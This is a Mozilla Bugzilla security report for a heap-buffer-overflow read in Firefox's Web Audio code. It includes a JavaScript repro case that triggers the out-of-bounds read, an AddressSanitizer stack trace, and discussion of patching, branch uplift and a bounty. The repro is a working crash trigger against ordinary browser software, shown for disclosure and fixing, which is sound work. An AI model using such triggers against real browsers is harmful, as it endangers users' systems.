Closed Bug 874915 Opened 11 years ago Closed 11 years ago

Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer

Categories

(Core :: Web Audio, defect)

x86_64
All
defect
Not set
normal

Tracking

()

RESOLVED FIXED
mozilla24
Tracking Status
firefox21 --- unaffected
firefox22 + disabled
firefox23 + disabled
firefox24 + fixed
firefox-esr17 --- unaffected
b2g18 --- unaffected

People

(Reporter: attekett, Assigned: ehsan.akhgari)

References

Details

(4 keywords, Whiteboard: [asan][adv-main24-])

Attachments

(2 files)

Tested on: OS: Ubuntu 12.04 Firefox: ASAN opt-build 24.0a1 from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/ Repro-case: <script> var Context0= new AudioContext() var BufferSource6=Context0.createBufferSource(); setInterval(function(){ BufferSource6.buffer=function(){ var length=11283; var Buffer=Context0.createBuffer(1,length,Context0.sampleRate); var bufferData= Buffer.getChannelData(0); for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(624))}; return Buffer; }(); },0) BufferSource6.start(0.15831333969254047,0.23571860056836158,0.529235512483865); BufferSource6.buffer=function(){ var length=48517; var Buffer=Context0.createBuffer(1,length,Context0.sampleRate); var bufferData= Buffer.getChannelData(0); for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(365))}; return Buffer; }(); </script> ASAN-report: ==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068 READ of size 1 at 0x7f44ca227118 thread T26 #0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172 #1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392 #2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411 #3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937 #4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163 #5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238 . . .
OS: Linux → All
Blocks: webaudio
Attached file Testcase (deleted) —
Attachment #752781 - Attachment mime type: text/plain → text/html
For the analysis, see bug 874934.
Attached patch Patch (v1) (deleted) — Splinter Review
Assignee: nobody → ehsan
Status: NEW → ASSIGNED
Attachment #752894 - Flags: review?(roc)
Blocks: 875617
Status: ASSIGNED → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Flags: sec-bounty?
WebAudio is disabled in Firefox 22 and 23, correct?
Flags: sec-bounty? → sec-bounty+
This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating. https://wiki.mozilla.org/Security/Bug_Approval_Process We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]
(In reply to Daniel Veditz [:dveditz] from comment #9) > WebAudio is disabled in Firefox 22 and 23, correct? Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta. (In reply to Al Billings [:abillings] from comment #10) > We'll need to take this on Aurora and Beta now to make sure we don't ship it > if it isn't disabled by default. Please nominate patches for those branches. > What are the risks associated with doing so? Will the existing patch apply? This is not needed on Beta since Web Audio is disabled there. And it will be disabled on 23 once it gets to release. Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...
Mass moving Web Audio bugs to the Web Audio component. Filter on duckityduck.
Component: Video/Audio → Web Audio
Attachment #757679 - Attachment description: Bounty Awarded $3000 → Bounty Awarded $3000 [paid] 6/6/13
Whiteboard: [asan] → [asan][adv-main24-]
Flags: in-testsuite?
Flags: in-testsuite? → in-testsuite+
Group: core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: